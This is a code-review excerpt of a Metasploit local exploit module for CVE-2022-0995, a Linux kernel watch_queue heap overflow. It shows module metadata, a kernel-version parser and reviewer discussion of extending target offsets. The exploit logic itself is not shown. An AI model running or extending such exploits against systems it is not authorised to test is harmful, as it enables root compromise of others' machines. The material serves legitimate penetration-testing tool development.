modules/exploits/linux/local/cve_2022_0995_watch_queue.rb

```diff
@@ -0,0 +1,162 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Compile
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Watch Queue Out of Bounds Write',
+        'Description' => %q{
+          This module exploits a vulnerability in the Linux Kernel's watch_queue event notification system. It relies on a heap
+          out-of-bounds write in kernel memory. The exploit fails occasionally, but it does not crash the target and can be run
+          multiple times until privilege escalation is achieved.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'bonfee',     # PoC
+          'bwatters-r7' # Aka @tychos_moose, Metasploit Module
+        ],
+        'DisclosureDate' => '2022-03-14',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2022-0995' ],
+          [ 'URL', 'https://github.com/Bonfee/CVE-2022-0995' ],
+          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=93ce93587d36493f2f86921fa79921b3cba63fbb' ],
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0995' ]
+        ],
+        'Targets' => [
+          [ 'Ubuntu Linux 5.13.0-37', {} ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_OS_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options [
+      OptBool.new('DEBUG_SOURCE', [ false, 'Use source code with debug prints to help troubleshoot', false ])
+    ]
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def pull_version
+    version_array = kernel_release.split('-')
+    if version_array.length < 2
+      fail_with(Failure::UnexpectedReply, 'The target does not have the expected kernel version format!')
+    end
+    vprint_status("Version array: #{version_array}")
+    major_version = Rex::Version.new(version_array[0])
+    vprint_status("major_version: #{major_version}")
+    minor_version = version_array[1].strip unless version_array[1].nil?
+    vprint_status("minor_version: #{minor_version}")
+    return [major_version, minor_version]
+  end
```

Comment:
In addition to the kernel release, the kernel type is also important. This exploit only has offsets for `generic`.  The offsets for other kernels, such as `lowlatency` are unlikely to be the same. For now, a simple string check for `"-generic"` would be sufficient.

I haven't looked into this exploit yet. I'll take a look this weekend. If the ROP chain for other kernel releases and types is the same I'll add some more targets.

Reply:
Should hopefully be resolved in https://github.com/rapid7/metasploit-framework/pull/16422/commits/69b54c8448b365ed36456946bcfd866bc506b52e